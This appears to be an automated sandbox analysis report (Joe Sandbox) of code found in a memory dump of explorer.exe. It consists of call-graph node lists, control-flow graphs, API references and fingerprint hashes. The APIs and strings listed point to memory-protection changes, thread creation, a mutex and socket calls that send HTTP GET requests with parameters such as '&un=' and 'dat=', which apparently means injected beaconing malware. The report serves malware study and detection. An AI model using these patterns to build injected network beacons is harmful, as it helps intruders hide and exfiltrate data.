13641->13640 13642 e4d844d CreateThread 13641->13642 13642->13620 13645 e4dbf06 13643->13645 13644 e4dbfa4 13644->13620 13645->13644 13646 e4d88f2 NtProtectVirtualMemory 13645->13646 13647 e4dbf9c 13646->13647 13648 e4df382 ObtainUserAgentString 13647->13648 13648->13644 13652 e4dc016 13649->13652 13650 e4dc0f0 13650->13620 13651 e4dc0e8 13653 e4df382 ObtainUserAgentString 13651->13653 13652->13650 13654 e4d88f2 NtProtectVirtualMemory 13652->13654 13655 e4dc0bb 13652->13655 13653->13650 13654->13655 13655->13651 13656 e4d88f2 NtProtectVirtualMemory 13655->13656 13656->13651 13659 e4dc137 13657->13659 13658 e4dc2d5 13658->13620 13659->13658 13660 e4d88f2 NtProtectVirtualMemory 13659->13660 13661 e4dc28a 13660->13661 13662 e4d88f2 NtProtectVirtualMemory 13661->13662 13665 e4dc2a9 13662->13665 13663 e4dc2cd 13664 e4df382 ObtainUserAgentString 13663->13664 13664->13658 13665->13663 13666 e4d88f2 NtProtectVirtualMemory 13665->13666 13666->13663 13669 e4dc349 13667->13669 13668 e4dc4c3 13675 e4d88f2 NtProtectVirtualMemory 13668->13675 13676 e4dc597 13668->13676 13670 e4dc49f 13669->13670 13672 e4d88f2 NtProtectVirtualMemory 13669->13672 13670->13668 13671 e4d88f2 NtProtectVirtualMemory 13670->13671 13671->13668 13673 e4dc480 13672->13673 13674 e4d88f2 NtProtectVirtualMemory 13673->13674 13674->13670 13675->13676 13677 e4d88f2 NtProtectVirtualMemory 13676->13677 13679 e4dc5bf 13676->13679 13677->13679 13678 e4dc6e1 13680 e4df382 ObtainUserAgentString 13678->13680 13681 e4d88f2 NtProtectVirtualMemory 13679->13681 13682 e4dc6b9 13679->13682 13683 e4dc6e9 13680->13683 13681->13682 13682->13678 13684 e4d88f2 NtProtectVirtualMemory 13682->13684 13683->13620 13684->13678 13686 e4dc767 13685->13686 13687 e4d88f2 NtProtectVirtualMemory 13686->13687 13692 e4dc903 13686->13692 13688 e4dc8e3 13687->13688 13689 e4d88f2 NtProtectVirtualMemory 13688->13689 13689->13692 13690 e4dc9b7 13691 e4df382 ObtainUserAgentString 13690->13691 13694 e4dc9bf 13691->13694 13693 e4dc992 13692->13693 
13695 e4d88f2 NtProtectVirtualMemory 13692->13695 13693->13690 13696 e4d88f2 NtProtectVirtualMemory 13693->13696 13694->13620 13695->13693 13696->13690 13698 e4d8987 13697->13698 13700 e4d89b2 13698->13700 13712 e4d9622 13698->13712 13701 e4d8ba2 13700->13701 13703 e4d8ac5 13700->13703 13705 e4d8c0c 13700->13705 13702 e4e4e12 NtProtectVirtualMemory 13701->13702 13711 e4d8b5b 13702->13711 13716 e4e4e12 13703->13716 13705->13629 13706 e4e4e12 NtProtectVirtualMemory 13706->13705 13707 e4d8ae3 13707->13705 13708 e4d8b3d 13707->13708 13709 e4e4e12 NtProtectVirtualMemory 13707->13709 13710 e4e4e12 NtProtectVirtualMemory 13708->13710 13709->13708 13710->13711 13711->13705 13711->13706 13713 e4d967a 13712->13713 13714 e4d9684 13713->13714 13715 e4e4e12 NtProtectVirtualMemory 13713->13715 13714->13700 13715->13713 13717 e4e4e45 NtProtectVirtualMemory 13716->13717 13720 e4e3942 13716->13720 13719 e4e4e70 13717->13719 13719->13707 13721 e4e3967 13720->13721 13721->13717 13723 e4df3c7 13722->13723 13726 e4df232 13723->13726 13725 e4df438 13725->13636 13727 e4df25e 13726->13727 13730 e4de8c2 13727->13730 13729 e4df26b 13729->13725 13731 e4de934 13730->13731 13732 e4de9a6 13731->13732 13733 e4de995 ObtainUserAgentString 13731->13733 13732->13729 13733->13732 13793 e4d942e 13794 e4d945b 13793->13794 13802 e4d94c9 13793->13802 13795 e4e3232 NtCreateFile 13794->13795 13794->13802 13796 e4d9496 13795->13796 13798 e4d9082 NtCreateFile 13796->13798 13801 e4d94c5 13796->13801 13797 e4e3232 NtCreateFile 13797->13802 13799 e4d94b6 13798->13799 13800 e4d8f52 NtCreateFile 13799->13800 13799->13801 13800->13801 13801->13797 13801->13802 13803 e4df22a 13804 e4df25e 13803->13804 13805 e4de8c2 ObtainUserAgentString 13804->13805 13806 e4df26b 13805->13806 13889 e4e5aa9 13890 e4e5aaf 13889->13890 13893 e4e0212 13890->13893 13892 e4e5ac7 13894 e4e021b 13893->13894 13895 e4e0237 13893->13895 13894->13895 13896 e4e00c2 6 API calls 13894->13896 13895->13892 13896->13895 13841 e4e02e4 13842 e4e036f 
13841->13842 13843 e4e0305 13841->13843 13843->13842 13845 e4e00c2 13843->13845 13846 e4e01f0 13845->13846 13847 e4e00cb 13845->13847 13846->13842 13847->13846 13848 e4e3f82 6 API calls 13847->13848 13848->13846 13921 e4dab66 13922 e4dab6a 13921->13922 13923 e4dacb5 CreateMutexExW 13922->13923 13924 e4dacce 13922->13924 13923->13924 13849 e4ddce2 13850 e4dddd9 13849->13850 13851 e4de022 13850->13851 13852 e4dd352 NtCreateFile 13850->13852 13853 e4ddf0d 13852->13853 13853->13851 13854 e4dd792 NtCreateFile 13853->13854 13854->13853 13964 e4dbfbf 13967 e4dc016 13964->13967 13965 e4dc0f0 13966 e4dc0e8 13968 e4df382 ObtainUserAgentString 13966->13968 13967->13965 13969 e4d88f2 NtProtectVirtualMemory 13967->13969 13970 e4dc0bb 13967->13970 13968->13965 13969->13970 13970->13966 13971 e4d88f2 NtProtectVirtualMemory 13970->13971 13971->13966 13897 e4de8be 13898 e4de8c3 13897->13898 13899 e4de9a6 13898->13899 13900 e4de995 ObtainUserAgentString 13898->13900 13900->13899 13807 e4e283a 13808 e4e2841 13807->13808 13809 e4e3f82 6 API calls 13808->13809 13811 e4e28c5 13809->13811 13810 e4e2906 13811->13810 13812 e4e3232 NtCreateFile 13811->13812 13812->13810 13929 e4e3f7a 13930 e4e3fb8 13929->13930 13931 e4e05b2 socket 13930->13931 13933 e4e4081 13930->13933 13940 e4e4022 13930->13940 13931->13933 13932 e4e4134 13934 e4e0732 connect 13932->13934 13938 e4e41b2 13932->13938 13932->13940 13933->13932 13935 e4e4117 getaddrinfo 13933->13935 13933->13940 13934->13938 13935->13932 13936 e4e06b2 send 13939 e4e4729 13936->13939 13937 e4e47f4 setsockopt recv 13937->13940 13938->13936 13938->13940 13939->13937 13939->13940 13855 e4dc0fb 13857 e4dc137 13855->13857 13856 e4dc2d5 13857->13856 13858 e4d88f2 NtProtectVirtualMemory 13857->13858 13859 e4dc28a 13858->13859 13860 e4d88f2 NtProtectVirtualMemory 13859->13860 13863 e4dc2a9 13860->13863 13861 e4dc2cd 13862 e4df382 ObtainUserAgentString 13861->13862 13862->13856 13863->13861 13864 e4d88f2 NtProtectVirtualMemory 13863->13864 13864->13861 
13901 e4e00b9 13902 e4e00ed 13901->13902 13904 e4e01f0 13901->13904 13903 e4e3f82 6 API calls 13902->13903 13902->13904 13903->13904 13865 e4dc2f4 13866 e4dc349 13865->13866 13867 e4dc49f 13866->13867 13869 e4d88f2 NtProtectVirtualMemory 13866->13869 13868 e4d88f2 NtProtectVirtualMemory 13867->13868 13872 e4dc4c3 13867->13872 13868->13872 13870 e4dc480 13869->13870 13871 e4d88f2 NtProtectVirtualMemory 13870->13871 13871->13867 13873 e4d88f2 NtProtectVirtualMemory 13872->13873 13874 e4dc597 13872->13874 13873->13874 13875 e4d88f2 NtProtectVirtualMemory 13874->13875 13877 e4dc5bf 13874->13877 13875->13877 13876 e4dc6e1 13878 e4df382 ObtainUserAgentString 13876->13878 13879 e4d88f2 NtProtectVirtualMemory 13877->13879 13880 e4dc6b9 13877->13880 13881 e4dc6e9 13878->13881 13879->13880 13880->13876 13882 e4d88f2 NtProtectVirtualMemory 13880->13882 13882->13876 13738 e4e3232 13740 e4e325c 13738->13740 13741 e4e3334 13738->13741 13739 e4e3410 NtCreateFile 13739->13741 13740->13739 13740->13741 13883 e4d80f1 13884 e4d81d3 13883->13884 13885 e4d8109 13883->13885 13886 e4d8012 6 API calls 13885->13886 13887 e4d8113 13886->13887 13887->13884 13888 e4e3f82 6 API calls 13887->13888 13888->13884 13948 e4d95f1 13949 e4d960e 13948->13949 13950 e4d9606 13948->13950 13951 e4de662 6 API calls 13950->13951 13951->13949 13972 e4e59b3 13973 e4e59bd 13972->13973 13976 e4da6d2 13973->13976 13975 e4e59e0 13977 e4da704 13976->13977 13978 e4da6f7 13976->13978 13980 e4da6ff 13977->13980 13981 e4da72d 13977->13981 13983 e4da737 13977->13983 13979 e4d80f2 6 API calls 13978->13979 13979->13980 13980->13975 13985 e4e02c2 13981->13985 13983->13980 13984 e4e3f82 6 API calls 13983->13984 13984->13980 13986 e4e02df 13985->13986 13987 e4e02cb 13985->13987 13986->13980 13987->13986 13988 e4e00c2 6 API calls 13987->13988 13988->13986 13952 e4e59f1 13953 e4e59f7 13952->13953 13956 e4da852 13953->13956 13955 e4e5a0f 13957 e4da865 13956->13957 13958 e4da8e4 13956->13958 13957->13958 13960 e4da887 
13957->13960 13962 e4da87e 13957->13962 13958->13955 13959 e4e036f 13959->13955 13960->13958 13961 e4de662 6 API calls 13960->13961 13961->13958 13962->13959 13963 e4e00c2 6 API calls 13962->13963 13963->13959

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 e4e3f82-e4e3fb6 1 e4e3fb8-e4e3fbc 0->1 2 e4e3fd6-e4e3fd9 0->2 1->2 5 e4e3fbe-e4e3fc2 1->5 3 e4e48fe-e4e490c 2->3 4 e4e3fdf-e4e3fed 2->4 6 e4e48f6-e4e48f7 4->6 7 e4e3ff3-e4e3ff7 4->7 5->2 8 e4e3fc4-e4e3fc8 5->8 6->3 9 e4e3fff-e4e4000 7->9 10 e4e3ff9-e4e3ffd 7->10 8->2 11 e4e3fca-e4e3fce 8->11 13 e4e400a-e4e4010 9->13 10->9 10->13 11->2 12 e4e3fd0-e4e3fd4 11->12 12->2 12->4 14 e4e403a-e4e4060 13->14 15 e4e4012-e4e4020 13->15 17 e4e4068-e4e407c call e4e05b2 14->17 18 e4e4062-e4e4066 14->18 15->14 16 e4e4022-e4e4026 15->16 16->6 19 e4e402c-e4e4035 16->19 24 e4e4081-e4e40a2 17->24 18->17 20 e4e40a8-e4e40ab 18->20 19->6 22 e4e4144-e4e4150 20->22 23 e4e40b1-e4e40b8 20->23 27 e4e48ee-e4e48ef 22->27 28 e4e4156-e4e4165 22->28 25 e4e40ba-e4e40dc call e4e3942 23->25 26 e4e40e2-e4e40f5 23->26 24->20 24->27 25->26 26->27 30 e4e40fb-e4e4101 26->30 27->6 31 e4e417f-e4e418f 28->31 32 e4e4167-e4e4178 call e4e0552 28->32 30->27 36 e4e4107-e4e4109 30->36 33 e4e41e5-e4e421b 31->33 34 e4e4191-e4e41ad call e4e0732 31->34 32->31 39 e4e422d-e4e4231 33->39 40 e4e421d-e4e422b 33->40 43 e4e41b2-e4e41da 34->43 36->27 41 e4e410f-e4e4111 36->41 45 e4e4247-e4e424b 39->45 46 e4e4233-e4e4245 39->46 44 e4e427f-e4e4280 40->44 41->27 47 e4e4117-e4e4132 getaddrinfo 41->47 43->33 48 e4e41dc-e4e41e1 43->48 52 e4e4283-e4e42e0 call e4e4d62 call e4e1482 call e4e0e72 call e4e5002 44->52 49 e4e424d-e4e425f 45->49 50 e4e4261-e4e4265 45->50 46->44 47->22 51 e4e4134-e4e413c 47->51 48->33 49->44 53 e4e426d-e4e4279 50->53 54 e4e4267-e4e426b 50->54 51->22 63 e4e42f4-e4e4354 call e4e4d92 52->63 64 e4e42e2-e4e42e6 52->64 53->44 54->52 54->53 69 e4e448c-e4e44b8 call e4e4d62 call e4e5262 63->69 70 e4e435a-e4e4396 call e4e4d62 call e4e5262 call e4e5002 63->70 64->63 65 e4e42e8-e4e42ef call e4e1042 64->65 65->63 79 e4e44ba-e4e44d5 
69->79 80 e4e44d9-e4e4590 call e4e5262 * 3 call e4e5002 * 2 call e4e1482 69->80 85 e4e43bb-e4e43e9 call e4e5262 * 2 70->85 86 e4e4398-e4e43b7 call e4e5262 call e4e5002 70->86 79->80 111 e4e4595-e4e45b9 call e4e5262 80->111 101 e4e43eb-e4e4410 call e4e5002 call e4e5262 85->101 102 e4e4415-e4e441d 85->102 86->85 101->102 103 e4e441f-e4e4425 102->103 104 e4e4442-e4e4448 102->104 108 e4e4467-e4e4487 call e4e5262 103->108 109 e4e4427-e4e443d 103->109 110 e4e444e-e4e4456 104->110 104->111 108->111 109->111 110->111 115 e4e445c-e4e445d 110->115 120 e4e45bb-e4e45cc call e4e5262 call e4e5002 111->120 121 e4e45d1-e4e46ad call e4e5262 * 7 call e4e5002 call e4e4d62 call e4e5002 call e4e0e72 call e4e1042 111->121 115->108 132 e4e46af-e4e46b3 120->132 121->132 134 e4e46ff-e4e472d call e4e06b2 132->134 135 e4e46b5-e4e46fa call e4e0382 call e4e07b2 132->135 145 e4e472f-e4e4735 134->145 146 e4e475d-e4e4761 134->146 155 e4e48e6-e4e48e7 135->155 145->146 151 e4e4737-e4e474c 145->151 147 e4e490d-e4e4913 146->147 148 e4e4767-e4e476b 146->148 157 e4e4779-e4e4784 147->157 158 e4e4919-e4e4920 147->158 152 e4e48aa-e4e48df call e4e07b2 148->152 153 e4e4771-e4e4773 148->153 151->146 156 e4e474e-e4e4754 151->156 152->155 153->152 153->157 155->27 156->146 163 e4e4756 156->163 159 e4e4786-e4e4793 157->159 160 e4e4795-e4e4796 157->160 158->159 159->160 164 e4e479c-e4e47a0 159->164 160->164 163->146 167 e4e47a2-e4e47af 164->167 168 e4e47b1-e4e47b2 164->168 167->168 170 e4e47b8-e4e47c4 167->170 168->170 173 e4e47c6-e4e47ef call e4e4d92 call e4e4d62 170->173 174 e4e47f4-e4e4861 setsockopt recv 170->174 173->174 177 e4e48a3-e4e48a4 174->177 178 e4e4863 174->178 177->152 178->177 179 e4e4865-e4e486a 178->179 179->177 182 e4e486c-e4e4872 179->182 182->177 185 e4e4874-e4e48a1 182->185 185->177 185->178
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                            • API String ID: 1564272048-1117930895
                                                                                                                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                            • Instruction ID: 98fb2c7abf5ae99f67f7f191fe9be5d431686edaf0e6563e02800daaf30c5ce7
                                                                                                                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D52BE30618A088BCB29EF68C4947EAB7E1FB54305F504A6FC4AFC7746DE74A945CB81

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
• Graph summary (graphviz node list, figure not rendered): entry block e4e3232-e4e3256; nodes reference NtCreateFile and the internal calls e4e3942 and e4e3172.
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: f74f88d546928ebd3b295b0de1dbfc4e88ce8153458df6a3fa20a1c108181d6c
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: 4E220970A18A099FCB5ADF68C4956AEF7E1FB98302F40462FE45ED7750DB30A851CB81

Control-flow Graph
• Graph summary (graphviz node list, figure not rendered): entry block e4e4e12-e4e4e38; nodes reference NtProtectVirtualMemory and the internal call e4e3942.
APIs
• NtProtectVirtualMemory.NTDLL ref: 0E4E4E67
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: 97b8c2225c83d1a4ed9fab4e1f8f4d895258adbb6f0541d62723eb5efbaba733
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: CC019E30628B484F8B88EF6C948422AB7E4FBD9215F000B3EE99AC3250EB60C9414742

Control-flow Graph
• Graph summary (graphviz node list, figure not rendered): entry block e4e4e0a-e4e4e6e; nodes reference the internal call e4e3942 and NtProtectVirtualMemory.
APIs
• NtProtectVirtualMemory.NTDLL ref: 0E4E4E67
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: 2cd02c88e783746e88674e0e464086fbb92a6cca9c9c26bdeabb523e3fab4f39
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 8601A234628B884B8B48EF2C94452A6B3E5FBCE315F000B3FE9DAC3240DB21D9024782

Control-flow Graph
APIs
• ObtainUserAgentString.URLMON ref: 0E4DE9A0
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: e8a70c2ba7d19d15aa365a8ab9076abd8080e90c6e35647bc53fd27f3a71685c
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 3E31C031614A0D8BCB44EFA9C8847EEB7E0FB58209F40066FE45ED7340DE788A458789

Control-flow Graph
APIs
• ObtainUserAgentString.URLMON ref: 0E4DE9A0
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: 4509b7cc57895cac662d6ff27909d968995760343b15e8740b2ba1a015ae388d
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: EF21C370A14A0D8BCB45EFA9C8947EE7BE1FF58209F40465FE45AD7340DF788A058789

Control-flow Graph
• Graph summary (graphviz node list, figure not rendered): entry block e4dab66-e4dab68; nodes reference the internal calls e4e1612, e4e3942, e4e5da4, e4e5022 and e4e53e2, and CreateMutexExW.
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: bf66ac992f51cb8899f6df96edbb0dfee2c065b1eb03078283176992237799c0
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: 59416B70918A088FDB54EFA8C8D8BAD77E0FB98301F04467BD84EDB255DE349945CB85

Control-flow Graph
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: 008c89b5f2e869da88f7d7206e11747ebd42296ba0ff777ed1ac2363f9eafb74
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: 68414970918A088FDB94EFA8C498BAD77F0FB68301F04457BD84EDB256DE349945CB85

Control-flow Graph
• Graph summary (graphviz node list, figure not rendered): entry block e4e072e-e4e0768; nodes reference the internal call e4e3942 and connect.
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: c462da55f8737395a0625b5b7c75b655562a90e410136c0bb1d35016a8adcc67
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: 7C014C30618B188FCB94EF1CE088B55B7E0EB58315F1545AE990DCB226C674C8818BC2

Control-flow Graph
• Graph summary (graphviz node list, figure not rendered): entry block e4e0732-e4e0768; nodes reference the internal call e4e3942 and connect.
Memory Dump Source
• Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: 028ac7b1c1350ef4ea5880095ffb3be9ee59b9f25f5e4ee2be7feeecbd6a385b
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: C3011A70618A1C8FCB94EF5CA088B55B7E0EB59315F1545AEA80DCB226CAB4C9818BC2

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 411 e4e06b2-e4e06e5 412 e4e06e7-e4e06ff call e4e3942 411->412 413 e4e0705-e4e072d send 411->413 412->413
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: send
                                                                                                                                                                            • String ID: send
                                                                                                                                                                            • API String ID: 2809346765-2809346765
                                                                                                                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                            • Instruction ID: c088726c8e762263e7069f143a305912e5cd646d0e04a7a792db0bf33f2797d7
                                                                                                                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                            • Instruction Fuzzy Hash: B7011270518A188FDB84EF5CD088B2577E0EB58315F1546AED85DCB366C670D8818B81

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 416 e4e05b2-e4e05ea 417 e4e05ec-e4e0604 call e4e3942 416->417 418 e4e060a-e4e062b socket 416->418 417->418
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: socket
                                                                                                                                                                            • String ID: sock
                                                                                                                                                                            • API String ID: 98920635-2415254727
                                                                                                                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                            • Instruction ID: 52407786c8e33191170161cee7566cb56ab13d170b49ca7d68d333f477a1a1dc
                                                                                                                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                            • Instruction Fuzzy Hash: D30121706186188FCB84EF1CD048B55BBE0FB59315F1545AED45ECB366C7B0C9818B86

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 421 e4d82dd-e4d8320 call e4e3942 424 e4d83fa-e4d840e 421->424 425 e4d8326 421->425 426 e4d8328-e4d8339 SleepEx 425->426 426->426 427 e4d833b-e4d8341 426->427 428 e4d834b-e4d8352 427->428 429 e4d8343-e4d8349 427->429 431 e4d8354-e4d835a 428->431 432 e4d8370-e4d8376 428->432 429->428 430 e4d835c-e4d836a call e4e2f12 429->430 430->432 431->430 431->432 434 e4d8378-e4d837e 432->434 435 e4d83b7-e4d83bd 432->435 434->435 439 e4d8380-e4d838a 434->439 436 e4d83bf-e4d83cf call e4d8e72 435->436 437 e4d83d4-e4d83db 435->437 436->437 437->426 441 e4d83e1-e4d83f5 call e4d80f2 437->441 439->435 442 e4d838c-e4d83b1 call e4d9432 439->442 441->426 442->435
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                            • Instruction ID: 9023c3f4d2c915b2b864d3ae3ab168ad9626f24677986d8bb8125ba421f164c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                            • Instruction Fuzzy Hash: CA316FB0518B49DFDB68DF6A80682AAB7A0FB58300F44467FC91DC7206C7759858CF91

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 457 e4d8412-e4d8446 call e4e3942 460 e4d8448-e4d8472 call e4e5c9e CreateThread 457->460 461 e4d8473-e4d847d 457->461
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                            • Instruction ID: 9e483fec1d6bcddf782ffe76ef8f272cf64ea22974f87ab2880f110d76dea8c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
